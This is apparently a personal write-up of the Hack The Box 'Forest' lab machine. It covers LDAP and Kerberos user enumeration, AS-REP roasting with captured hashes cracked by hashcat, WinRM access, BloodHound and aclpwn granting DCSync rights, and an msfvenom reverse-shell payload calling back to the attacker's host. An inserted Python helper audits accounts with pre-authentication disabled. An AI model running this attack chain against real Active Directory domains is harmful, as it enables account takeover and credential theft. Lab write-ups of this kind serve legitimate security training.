This is a Windows machine from Hack The Box.
Nmap scan
└─$ nmap -sV -sC -oA active 10.10.10.161
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-06 06:08 EDT
Nmap scan report for 10.10.10.161
Host is up (0.34s latency).
Not shown: 989 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-09-06 10:15:54Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-09-06T10:16:17
|_ start_date: 2023-09-06T10:13:19
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
|_clock-skew: mean: 2h26m52s, deviation: 4h02m31s, median: 6m50s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2023-09-06T03:16:16-07:00
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 96.20 seconds
Trying port 445 as potential low-hanging fruit
┌──(kali㉿kali)-[~]
└─$ crackmapexec smb 10.10.10.161 -u "" -p ""
SMB 10.10.10.161 445 FOREST [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
Domain is htb.local
Enumerating shares – getting nothing much
┌──(kali㉿kali)-[~/HTB/Forest]
└─$ crackmapexec smb 10.10.10.161 --shares
SMB 10.10.10.161 445 FOREST [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/impacket/smbconnection.py", line 358, in connectTree
return self._SMBConnection.connect_tree(share)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/impacket/smb.py", line 2835, in tree_connect_andx
Using ldapsearch to try and get usernames, with the command "ldapsearch -x -H ldap://10.10.10.161 -b 'DC=EGOTISTICAL-BANK,DC=LOCAL' -s sub '(objectClass=person)' sAMAccountName". First, find the naming contexts:
┌──(kali㉿kali)-[~/HTB/Forest]
└─$ ldapsearch -x -H ldap://10.10.10.161 -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#
#
dn:
namingContexts: DC=htb,DC=local
namingContexts: CN=Configuration,DC=htb,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=htb,DC=local
namingContexts: DC=DomainDnsZones,DC=htb,DC=local
namingContexts: DC=ForestDnsZones,DC=htb,DC=local
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
Then using the command to get the users, grepping only the sAMAccountName values: ldapsearch -x -H ldap://10.10.10.161 -b 'DC=htb,DC=LOCAL' -s sub '(objectClass=person)' sAMAccountName
Guest
DefaultAccount
FOREST$
EXCH01$
$331000-VK4ADACQNUCA
SM_2c8eef0a09b545acb
SM_ca8c2ed5bdab4dc9b
SM_75a538d3025e4db9a
SM_681f53d4942840e18
SM_1b41c9286325456bb
SM_9b69f1b9d2cc45549
SM_7c96b981967141ebb
SM_c75ee099d0a64c91b
SM_1ffab36a2f5f479cb
HealthMailboxc3d7722
HealthMailboxfc9daad
HealthMailboxc0a90c9
HealthMailbox670628e
HealthMailbox968e74d
HealthMailbox6ded678
HealthMailbox83d6781
HealthMailboxfd87238
HealthMailboxb01ac64
HealthMailbox7108a4e
HealthMailbox0659cc1
sebastien
lucinda
andy
mark
santi
Using kerbrute to find which users are valid, after writing the names to users.txt
┌──(kali㉿kali)-[~/HTB/Forest]
└─$ ./kerbrute userenum --dc 10.10.10.161 -d HTB.LOCAL users.txt
Version: v1.0.3 (9dad6e1) - 09/06/23 - Ronnie Flathers @ropnop
2023/09/06 06:28:11 > Using KDC(s):
2023/09/06 06:28:11 > 10.10.10.161:88
2023/09/06 06:28:11 > [+] VALID USERNAME: [email protected]
2023/09/06 06:28:11 > [+] VALID USERNAME: [email protected]
2023/09/06 06:28:11 > [+] VALID USERNAME: [email protected]
2023/09/06 06:28:11 > [+] VALID USERNAME: [email protected]
2023/09/06 06:28:11 > [+] VALID USERNAME: [email protected]
2023/09/06 06:28:11 > [+] VALID USERNAME: [email protected]
2023/09/06 06:28:11 > Done! Tested 6 usernames (6 valid) in 0.346 seconds
Adding htb.local to the hosts file
┌──(kali㉿kali)-[~/HTB/Forest]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.10.10.175 EGOTISTICAL-BANK.LOCAL
10.10.10.100 active.htb htb
10.190.10.161 htb.local
Using GetNPUsers.py from impacket, with example commands:
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py HTB.LOCAL/administrator
Impacket v0.11.0 - Copyright 2023 Fortra
Password:
^CTraceback (most recent call last):
File "/usr/share/doc/python3-impacket/examples/./GetNPUsers.py", line 470, in <module>
executer.run()
File "/usr/share/doc/python3-impacket/examples/./GetNPUsers.py", line 257, in run
ldapConnection = ldap.LDAPConnection('ldap://%s' % self.__target, self.baseDN, self.__kdcIP)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/impacket/ldap/ldap.py", line 115, in __init__
self._socket.connect(sa)
KeyboardInterrupt
Not able to get any hashes for these users:
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py HTB.LOCAL/Lucinda
Impacket v0.11.0 - Copyright 2023 Fortra
Password:
[*] Cannot authenticate Lucinda, getting its TGT
[-] User Lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py HTB.LOCAL/santi
Impacket v0.11.0 - Copyright 2023 Fortra
Password:
[*] Cannot authenticate santi, getting its TGT
[-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py HTB.LOCAL/mark
Impacket v0.11.0 - Copyright 2023 Fortra
Password:
[*] Cannot authenticate mark, getting its TGT
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py HTB.LOCAL/andy
Impacket v0.11.0 - Copyright 2023 Fortra
Password:
[*] Cannot authenticate andy, getting its TGT
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py HTB.LOCAL/sebastien
Impacket v0.11.0 - Copyright 2023 Fortra
Password:
[*] Cannot authenticate sebastien, getting its TGT
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
Using the command: GetNPUsers.py -dc-ip 10.10.10.161 -request 'htb.local/'
From ChatGPT: Effectively, the command is attempting to retrieve NTLM hashes for user accounts in the 'htb.local' domain from the domain controller at IP 10.10.10.161 that have the "Do not require Kerberos pre-authentication" setting enabled.
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py -dc-ip 10.10.10.161 -request 'htb.local/'
Impacket v0.11.0 - Copyright 2023 Fortra
Name MemberOf PasswordLastSet LastLogon UAC
------------ ------------------------------------------------------ -------------------------- -------------------------- --------
svc-alfresco CN=Service Accounts,OU=Security Groups,DC=htb,DC=local 2023-09-06 07:04:05.238787 2019-09-23 07:09:47.931194 0x410200
[email protected]:1fc8155b51cbc86433259e43c839f3b6$debc0747dcb68f4f0b7780f062d7b876a40957451858e76dded149772ee51dbebf968c991765873fc8bcb04d92ea7f5ea9f43c1ab5ca60f11befbf0d2fa4b5e6e6428cc58911fed2c99f9d690cb5cd36c9b3e83b75843f201d97ee0064749b4631e07807cc9ef420a255ada51413c0a95749aab4ee0f080045291085edd2d1849dc72baf68cb7048855b0820de16db49b7544699463273c81c8480cbf79b8c13006b897a20599b5a897975e2bcc0d4fabae512bbba6061e95735b2dd64320bbb798f515a2f240b072fe70020622b79a6d86deabc0c0186dbe79445d121802d14e36b23029594
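As an added audit-side example (not part of the original write-up): the 0x410200 in the UAC column above is what makes svc-alfresco AS-REP roastable. This Python decodes userAccountControl values, parses the GetNPUsers.py summary table, and reports enabled accounts with pre-authentication disabled; all sample entries other than svc-alfresco's value are constructed.

```python
"""Audit helper for the AS-REP roasting step: decode Active Directory
userAccountControl (UAC) values and report accounts that have Kerberos
pre-authentication disabled, the condition GetNPUsers.py looks for.

Added example, not part of the original write-up. Only svc-alfresco's
0x410200 comes from the tool output above; everything else is constructed.
"""

import re

# Subset of userAccountControl bit flags, as documented by Microsoft.
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x40000: "SMARTCARD_REQUIRED",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x100000: "NOT_DELEGATED",
    0x400000: "DONT_REQ_PREAUTH",
}
ACCOUNTDISABLE = 0x0002
DONT_REQ_PREAUTH = 0x400000


def decode_uac(value):
    """Return the names of all known flags set in a UAC value, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def asrep_roastable(entries):
    """Return sAMAccountNames of enabled accounts with pre-auth disabled.

    A disabled account cannot obtain a TGT, so it is not roastable even if
    DONT_REQ_PREAUTH is set; it still deserves a clean-up review.
    """
    return [
        e["sAMAccountName"]
        for e in entries
        if e["userAccountControl"] & DONT_REQ_PREAUTH
        and not e["userAccountControl"] & ACCOUNTDISABLE
    ]


# A data row of the GetNPUsers.py table: account name first, UAC hex value last.
_NPUSERS_ROW = re.compile(r"^(?P<name>\S+)\s+.*\s(?P<uac>0x[0-9a-fA-F]+)\s*$")


def parse_npusers_table(text):
    """Parse the Name/MemberOf/.../UAC table printed by GetNPUsers.py."""
    entries = []
    for line in text.splitlines():
        m = _NPUSERS_ROW.match(line)
        if not m:  # banner, header and separator lines do not end in a hex value
            continue
        entries.append({"sAMAccountName": m.group("name"),
                        "userAccountControl": int(m.group("uac"), 16)})
    return entries


def audit(entries):
    """Summarise each account: decoded flags and whether it is roastable."""
    roastable = set(asrep_roastable(entries))
    return {
        e["sAMAccountName"]: {
            "flags": decode_uac(e["userAccountControl"]),
            "roastable": e["sAMAccountName"] in roastable,
        }
        for e in entries
    }


# Constructed directory entries; UAC values chosen to exercise each branch.
SAMPLE_ENTRIES = [
    {"sAMAccountName": "svc-alfresco", "userAccountControl": 0x410200},  # from the tool output
    {"sAMAccountName": "sebastien", "userAccountControl": 0x10200},      # pre-auth required
    {"sAMAccountName": "old-svc", "userAccountControl": 0x400202},       # pre-auth off, but disabled
]

# Constructed copy of the GetNPUsers.py table layout shown above.
SAMPLE_NPUSERS_OUTPUT = """\
Impacket v0.11.0 - Copyright 2023 Fortra

Name          MemberOf                                                PasswordLastSet             LastLogon                   UAC
------------  ------------------------------------------------------  --------------------------  --------------------------  --------
svc-alfresco  CN=Service Accounts,OU=Security Groups,DC=htb,DC=local  2023-09-06 07:04:05.238787  2019-09-23 07:09:47.931194  0x410200
"""

if __name__ == "__main__":
    for name, info in audit(SAMPLE_ENTRIES).items():
        print(f"{name:14} roastable={info['roastable']!s:5} {' | '.join(info['flags'])}")
    print("parsed from GetNPUsers table:", parse_npusers_table(SAMPLE_NPUSERS_OUTPUT))
```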
Check the hash mode
./hashcat --example-hashes | less
Hash mode #18200
Name................: Kerberos 5, etype 23, AS-REP
Category............: Network Protocol
Slow.Hash...........: No
Password.Len.Min....: 0
Password.Len.Max....: 256
Salt.Type...........: Embedded
Salt.Len.Min........: 0
Salt.Len.Max........: 256
Kernel.Type(s)......: pure, optimized
Example.Hash.Format.: plain
Example.Hash........: [email protected]:3e156ada591263b8a...102ac [Truncated, use --mach for full length]
Example.Pass........: hashcat
Benchmark.Mask......: ?b?b?b?b?b?b?b
Autodetect.Enabled..: Yes
Self.Test.Enabled...: Yes
Potfile.Enabled.....: Yes
Custom.Plugin.......: No
Plaintext.Encoding..: ASCII, HEX
Cracking with hashcat gives the password s3rvice:
[email protected]:7d0b8ffb982981828a17da5d8eee9ec3$25f69765117a64010ad204b7d80d9a6ccbbc3144012f87316b517b126518efe6e0fbb1c3ea1a19ad630c4e61e2a80a6257048f2c8446b4e81fccf6da76d049c1b221924b2904800ed0c695180312ae92870831140785547ab76fca82564e101c0c67e7893d1890ae65cd394cf048e711ddd5546fefee809c15241044dc9ce08c49ccbaf7db218b7927f0bca416c202b356dcd554bb03c1cbfeba4848c3dec11575c4a328c8610d893b95334e23a1ac527d53ff806b96e424dab29e557a7fe5077eb3c32bdd50135b0256f988c5c992bf8c45114d0b9660a528f6400059ae5dafcf072dfc98f4:s3rvice
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: [email protected]:7d0b8ffb982981...fc98f4
Time.Started.....: Wed Sep 6 07:08:52 2023 (7 secs)
Time.Estimated...: Wed Sep 6 07:08:59 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 584.0 kH/s (1.52ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 4085760/14344385 (28.48%)
Rejected.........: 0/4085760 (0.00%)
Restore.Point....: 4083712/14344385 (28.47%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: s523480 -> s3r3ndipit
Hardware.Mon.#1..: Util: 71%
Started: Wed Sep 6 07:08:49 2023
Stopped: Wed Sep 6 07:09:01 2023
Using crackmapexec to check if we can pwn the box with these credentials
┌──(kali㉿kali)-[/usr/bin]
└─$ crackmapexec winrm 10.10.10.161 -u svc-alfresco -p s3rvice
SMB 10.10.10.161 5985 FOREST [*] Windows 10.0 Build 14393 (name:FOREST) (domain:htb.local)
HTTP 10.10.10.161 5985 FOREST [*] http://10.10.10.161:5985/wsman
WINRM 10.10.10.161 5985 FOREST [+] htb.local\svc-alfresco:s3rvice (Pwn3d!)
Using evil-winrm we get the user flag: 9b467960b7b0ddd353dd7a2ad776a254
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> cd ..
*Evil-WinRM* PS C:\Users\svc-alfresco> ls
Directory: C:\Users\svc-alfresco
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 9/23/2019 2:16 PM Desktop
d-r--- 9/22/2019 4:02 PM Documents
d-r--- 7/16/2016 6:18 AM Downloads
d-r--- 7/16/2016 6:18 AM Favorites
d-r--- 7/16/2016 6:18 AM Links
d-r--- 7/16/2016 6:18 AM Music
d-r--- 7/16/2016 6:18 AM Pictures
d----- 7/16/2016 6:18 AM Saved Games
d-r--- 7/16/2016 6:18 AM Videos
*Evil-WinRM* PS C:\Users\svc-alfresco> cd Desktop
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> ls
Directory: C:\Users\svc-alfresco\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 9/6/2023 3:13 AM 34 user.txt
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> cat user.txt
9b467960b7b0ddd353dd7a2ad776a254
Upload SharpHound.exe, run it from the folder it was uploaded to, then download the resulting zip file.
Info: Uploading /home/kali/HTB/Forest/SharpHound.exe to C:\Users\svc-alfresco\Desktop\SharpHound.exe
Data: 1395368 bytes of 1395368 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> ls
Directory: C:\Users\svc-alfresco\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/6/2023 4:26 AM 1046528 SharpHound.exe
-ar--- 9/6/2023 3:13 AM 34 user.txt
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> SharpHound.exe
The term 'SharpHound.exe' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1
+ SharpHound.exe
+ ~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (SharpHound.exe:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> ./SharpHound.exe
2023-09-06T04:28:17.2104460-07:00|INFORMATION|This version of SharpHound is compatible with the 4.3.1 Release of BloodHound
2023-09-06T04:28:17.6479741-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2023-09-06T04:28:17.7416956-07:00|INFORMATION|Initializing SharpHound at 4:28 AM on 9/6/2023
2023-09-06T04:28:18.5698497-07:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for htb.local : FOREST.htb.local
2023-09-06T04:28:18.7885786-07:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2023-09-06T04:28:19.8667072-07:00|INFORMATION|Beginning LDAP search for htb.local
2023-09-06T04:28:20.0073312-07:00|INFORMATION|Producer has finished, closing LDAP channel
2023-09-06T04:28:20.0073312-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2023-09-06T04:28:49.8983385-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 40 MB RAM
2023-09-06T04:29:03.4449219-07:00|INFORMATION|Consumers finished, closing output channel
2023-09-06T04:29:03.4917929-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2023-09-06T04:29:03.7574559-07:00|INFORMATION|Status: 161 objects finished (+161 3.744186)/s -- Using 48 MB RAM
2023-09-06T04:29:03.7574559-07:00|INFORMATION|Enumeration finished in 00:00:43.9036240
2023-09-06T04:29:03.8369185-07:00|INFORMATION|Saving cache with stats: 118 ID to type mappings.
117 name to SID mappings.
0 machine sid mappings.
2 sid to domain mappings.
0 global catalog mappings.
2023-09-06T04:29:03.8519606-07:00|INFORMATION|SharpHound Enumeration Completed at 4:29 AM on 9/6/2023! Happy Graphing!
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> ls
Directory: C:\Users\svc-alfresco\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/6/2023 4:29 AM 18650 20230906042902_BloodHound.zip
-a---- 9/6/2023 4:29 AM 19538 MzZhZTZmYjktOTM4NS00NDQ3LTk3OGItMmEyYTVjZjNiYTYw.bin
-a---- 9/6/2023 4:26 AM 1046528 SharpHound.exe
-ar--- 9/6/2023 3:13 AM 34 user.txt
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> download 20230906042902_BloodHound.zip
Info: Downloading C:\Users\svc-alfresco\Desktop\20230906042902_BloodHound.zip to 20230906042902_BloodHound.zip
Info: Download successful!
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop>
Using BloodHound
Start Neo4j:
┌──(kali㉿kali)-[~/HTB/Forest]
└─$ sudo neo4j console
[sudo] password for kali:
Directories in use:
home: /usr/share/neo4j
config: /usr/share/neo4j/conf
logs: /etc/neo4j/logs
plugins: /usr/share/neo4j/plugins
import: /usr/share/neo4j/import
data: /etc/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses: /usr/share/neo4j/licenses
run: /var/lib/neo4j/run
Starting Neo4j.
2023-09-06 11:25:48.852+0000 INFO Starting...
2023-09-06 11:25:51.070+0000 INFO This instance is ServerId{012fd76f} (012fd76f-f868-4f49-8648-df3c0a92529c)
Go to http://localhost:7474/ and change the password.
Start BloodHound with the bloodhound command and log in.
Go to Analysis -> Shortest Path to Domain Admin.
![[Pasted image 20230906194633.png]]
Found a very cool utility on GitHub that works through BloodHound paths automatically: github.com/fox-it/
pip install aclpwn
┌──(kali㉿kali)-[~/HTB/Forest]
└─$ sudo pip install aclpwn
[sudo] password for kali:
Collecting aclpwn
Downloading aclpwn-1.0.0-py3-none-any.whl (17 kB)
Requirement already satisfied: impacket in /usr/lib/python3/dist-packages (from aclpwn) (0.11.0)
Requirement already satisfied: ldap3>=2.5 in /usr/lib/python3/dist-packages (from aclpwn) (2.9.1)
Collecting neo4j-driver (from aclpwn)
Downloading neo4j-driver-5.12.0.tar.gz (191 kB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 191.1/191.1 kB 1.5 MB/s eta 0:00:00
Installing build dependencies ... done
Getting requirements to build wheel ... done
Installing backend dependencies ... done
Preparing metadata (pyproject.toml) ... done
Requirement already satisfied: requests in /usr/lib/python3/dist-packages (from aclpwn) (2.31.0)
Requirement already satisfied: dsinternals in /usr/lib/python3/dist-packages (from impacket->aclpwn) (1.2.4)
Requirement already satisfied: pytz in /usr/lib/python3/dist-packages (from neo4j-driver->aclpwn) (2023.3)
Building wheels for collected packages: neo4j-driver
Building wheel for neo4j-driver (pyproject.toml) ... done
Created wheel for neo4j-driver: filename=neo4j_driver-5.12.0-py3-none-any.whl size=263951 sha256=d520dd450afa34d41f327d68a05f95d96a4e6a57307dd65b309d5bdc48a501ee
Stored in directory: /root/.cache/pip/wheels/a4/f7/ba/ecf94a7eb4eb6631820c99bb894dcc90477101cb90e6d46237
Successfully built neo4j-driver
Installing collected packages: neo4j-driver, aclpwn
Successfully installed aclpwn-1.0.0 neo4j-driver-5.12.0
WARNING: Running pip as the 'root' user can result in broken permissions and conflicting behaviour with the system package manager. It is recommended to use a virtual environment instead: https://pip.pypa.io/warnings/venv
Running aclpwn on our machine after starting BloodHound: aclpwn -f [email protected] -t htb.local -tt domain --database 127.0.0.1 -du neo4j -dp password -s 10.10.10.161 -sp s3rvice
aclpwn -f svc-alfresco.local -t htb.local -tt domain --database 127.0.0.1 -du neo4j -dp password -a 10.10.10.161 -sp s3rvice
Traceback (most recent call last):
File "/usr/local/bin/aclpwn", line 5, in <module>
from aclpwn import main
File "/usr/local/lib/python3.11/dist-packages/aclpwn/__init__.py", line 7, in <module>
from aclpwn import utils, pathfinding, database, exploitation
File "/usr/local/lib/python3.11/dist-packages/aclpwn/pathfinding.py", line 1, in <module>
from aclpwn import utils, database
File "/usr/local/lib/python3.11/dist-packages/aclpwn/database.py", line 2, in <module>
from neo4j.v1 import GraphDatabase
ModuleNotFoundError: No module named 'neo4j.v1'
This error is because the neo4j-driver 5 package was installed and aclpwn expects the old neo4j.v1 module.
Will run this under a virtual environment:
sudo apt install python3.11-venv
python3 -m venv myenv
source myenv/bin/activate
pip install aclpwn neo4j==1.*
We then run the same command under this environment and still get the same error.
Found a fix via ChatGPT:
- Locate the database.py file for aclpwn. Based on your error, it's located at /usr/local/lib/python3.11/dist-packages/aclpwn/database.py
- Change from neo4j.v1 import GraphDatabase to from neo4j import GraphDatabase
After spending many hours with different versions of BloodHound and Neo4j, I finally got aclpwn to work.
To install aclpwn:
pip install aclpwn
Running BloodHound 3.0.5:
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-linux-x64]
└─$ ls
BloodHound chrome_200_percent.pak icudtl.dat libffmpeg.so libvk_swiftshader.so LICENSE locales resources.pak swiftshader version
chrome_100_percent.pak chrome-sandbox libEGL.so libGLESv2.so libvulkan.so LICENSES.chromium.html resources snapshot_blob.bin v8_context_snapshot.bin vk_swiftshader_icd.json
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-linux-x64]
└─$ ./BloodHound
(node:12127) [DEP0005] DeprecationWarning: Buffer() is deprecated due to security and usability issues. Please use the Buffer.alloc(), Buffer.allocUnsafe(), or Buffer.from() methods instead.
Starting Neo4j:
┌──(kali㉿kali)-[~]
└─$ sudo neo4j console
[sudo] password for kali:
Active database: graph.db
Directories in use:
home: /var/lib/neo4j
config: /etc/neo4j
logs: /var/log/neo4j
plugins: /var/lib/neo4j/plugins
import: /var/lib/neo4j/import
data: /var/lib/neo4j/data
certificates: /var/lib/neo4j/certificates
run: /var/run/neo4j
Starting Neo4j.
WARNING: Max 1024 open files allowed, minimum of 40000 recommended. See the Neo4j manual.
2023-09-09 12:33:43.663+0000 INFO ======== Neo4j 3.5.35 ========
2023-09-09 12:33:43.713+0000 INFO Starting...
2023-09-09 12:33:49.736+0000 INFO Bolt enabled on 127.0.0.1:7687.
2023-09-09 12:33:53.386+0000 INFO Started.
2023-09-09 12:33:55.678+0000 INFO Remote interface available at http://localhost:7474/
2023-09-09 12:35:20.565+0000 WARN The client is unauthorized due to authentication failure.
The SharpHound file we used is inside the source archive for BloodHound 3.0.5:
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3]
└─$ ls
BloodHound-3.0.5 BloodHound-3.0.5.zip BloodHound-linux-x64 'BloodHound-linux-x64(1).zip'
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3]
└─$ cd BloodHound-3.0.5
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-3.0.5]
└─$ ls
appveyor.yml deploy.sh index.html LICENSE-3RD-PARTY.md main.js package-lock.json renderer.js src webpack.config.production.js
BloodHoundExampleDB.db docs Ingestors LICENSE.md package.json README.md server.js webpack.config.development.js
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-3.0.5]
└─$ cd Ingestors
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-3.0.5/Ingestors]
└─$ ls
DebugBuilds SharpHound.exe SharpHound.ps1
Running aclpwn: ~/.local/bin/aclpwn -f [email protected] -t htb.local -tt domain --database 127.0.0.1 -du neo4j -dp password -s 10.10.10.161 -sp s3rvice
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-3.0.5/Ingestors]
└─$ ~/.local/bin/aclpwn -f [email protected] -t htb.local -tt domain --database 127.0.0.1 -du neo4j -dp password -s 10.10.10.161 -sp s3rvice
[!] Unsupported operation: GetChanges on HTB.LOCAL (Base,Domain)
[-] Invalid path, skipping
[!] Unsupported operation: GenericAll on EXCH01.HTB.LOCAL (Computer,Base)
[-] Invalid path, skipping
[+] Path found!
Path [0]: ([email protected])-[MemberOf]->(SERVICE [email protected])-[MemberOf]->(PRIVILEGED IT [email protected])-[MemberOf]->(ACCOUNT [email protected])-[GenericAll]->(EXCHANGE TRUSTED [email protected])-[MemberOf]->(EXCHANGE WINDOWS [email protected])-[WriteDacl]->(HTB.LOCAL)
[+] Path found!
Path [1]: ([email protected])-[MemberOf]->(SERVICE [email protected])-[MemberOf]->(PRIVILEGED IT [email protected])-[MemberOf]->(ACCOUNT [email protected])-[GenericAll]->(EXCHANGE WINDOWS [email protected])-[WriteDacl]->(HTB.LOCAL)
Please choose a path [0-1] 0
[-] Memberof -> continue
[-] Memberof -> continue
[-] Memberof -> continue
[-] Adding user SVC-ALFRESCO to group EXCHANGE TRUSTED [email protected]
[+] Added CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local as member to CN=Exchange Trusted Subsystem,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
[-] Re-binding to LDAP to refresh group memberships of [email protected]
[+] Re-bind successful
[-] Memberof -> continue
[-] Modifying domain DACL to give DCSync rights to SVC-ALFRESCO
[+] Dacl modification successful
[+] Finished running tasks
[+] Saved restore state to aclpwn-20230909-084819.restore
Now I need to run mimikatz, so I will upload a reverse shell and catch it on my computer so I can run mimikatz there, as mimikatz has issues running in evil-winrm from previous experience.
Creating the reverse shell with msfvenom:
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.6 LPORT=443 -f exe -o shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: shell.exe
┌──(kali㉿kali)-[~/HTB/Forest]
└─$ ls
20230909054106_BloodHound.zip aclpwn-20230909-084819.restore aclpwn.py active.gnmap active.nmap active.xml forest kerbrute SharpHound.exe shell.exe users.txt
┌──(kali㉿kali)-[~/HTB/Forest]
└─$ evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
